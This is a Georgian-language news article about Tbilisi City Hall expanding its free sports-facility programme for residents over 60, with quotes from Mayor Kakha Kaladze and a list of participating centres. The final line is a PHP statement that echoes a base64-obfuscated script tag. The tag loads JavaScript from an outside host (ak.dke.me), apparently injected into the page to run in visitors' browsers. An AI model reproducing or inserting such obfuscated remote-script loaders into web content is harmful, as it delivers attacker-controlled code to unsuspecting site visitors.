tube
ავერსი jaluzi

თბილისის მერია განაგრძობს პროგრამას - „სპორტი უფროსი თაობისთვის“, რომლის განხორციელებაც 2022 წელს დაიწყო. როგორც თბილისის მერმა კახა კალაძემ დღეს დედაქალაქის მთავრობის სხდომაზე განაცხადა, პროგრამას ორი სპორტული კომპლექსი სამი ობიექტით დაემატა, რაც პროგრამის ბენეფიციარი 60 წელს გადაცილებული პირების რაოდენობას დაახლოებით 1000-ით გაზრდის. შესაბამისად, პროგრამით სარგებლობა 3500-მდე პირს შეეძლება. 

როგორც თბილისის მერმა კახა კალაძემ დღეს დედაქალაქის მთავრობის სხდომაზე განაცხადა, პროგრამა პერიოდულად ფართოვდება და მასში სხვადასხვა კერძო და საჯარო სამართლის იურიდიული პირები ერთვებიან.

„ეს ჩვენი საარჩევნო დაპირება იყო. საშუალებას ვაძლევთ 60 წლის და მეტი ასაკის მქონე მოქალაქეებს, გამოიყენონ მუნიციპალიტეტის საკუთრებაში არსებული სხვადასხვა სპორტული ინფრასტრუქტურა - საცურაო აუზები და ფიტნესს დარბაზები ყოველგვარი გადასახადების გარეშე. დღეის მდგომარეობით, აღნიშნულ პროგრამაში 2 500-მდე მოქალაქეა ჩართული. ამასთან, პროგრამის აქტუალობიდან გამომდინარე, ასევე, გეოგრაფიული ხელმისაწვდომობის გაზრდის მიზნით, თბილისის მერიის ინიციატივით, პროგრამა პერიოდულად ფართოვდება და მასში სხვადასხვა კერძო და საჯარო სამართლის იურიდიული პირები, სპორტული ორგანიზაციები ერთვებიან. ამჯერად, აღნიშნულ პროგრამას შემოუერთდა შპს „ასპრია ჯგუფი“ ორი სპორტული ობიექტით და შპს „ფაუერ მაქსი“ - ერთი ობიექტით. ისინი, თბილისის მერიასთან პარტნიორობის ფარგლებში, შესაბამისი ასაკის მქონე მოქალაქეთა მომსახურებას უსასყიდლოდ უზრუნველყოფენ“, - განაცხადა კახა კალაძემ.

მისივე თქმით, ახალი ობიექტების გარდა, აღნიშნული პროგრამა ხორციელდება შემდეგ სპორტულ ცენტრებში: გლდანი-ნაძალადევის კომპლექსური სპორტული ცენტრი - ორი ობიექტი; დიდი დიღმის მრავალფუნქციური სპორტული ცენტრი; მრავალფუნქციური საზოგადოებრივი ცენტრის ასათიანის ქუჩის ფილიალი და „არენა“.

122
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");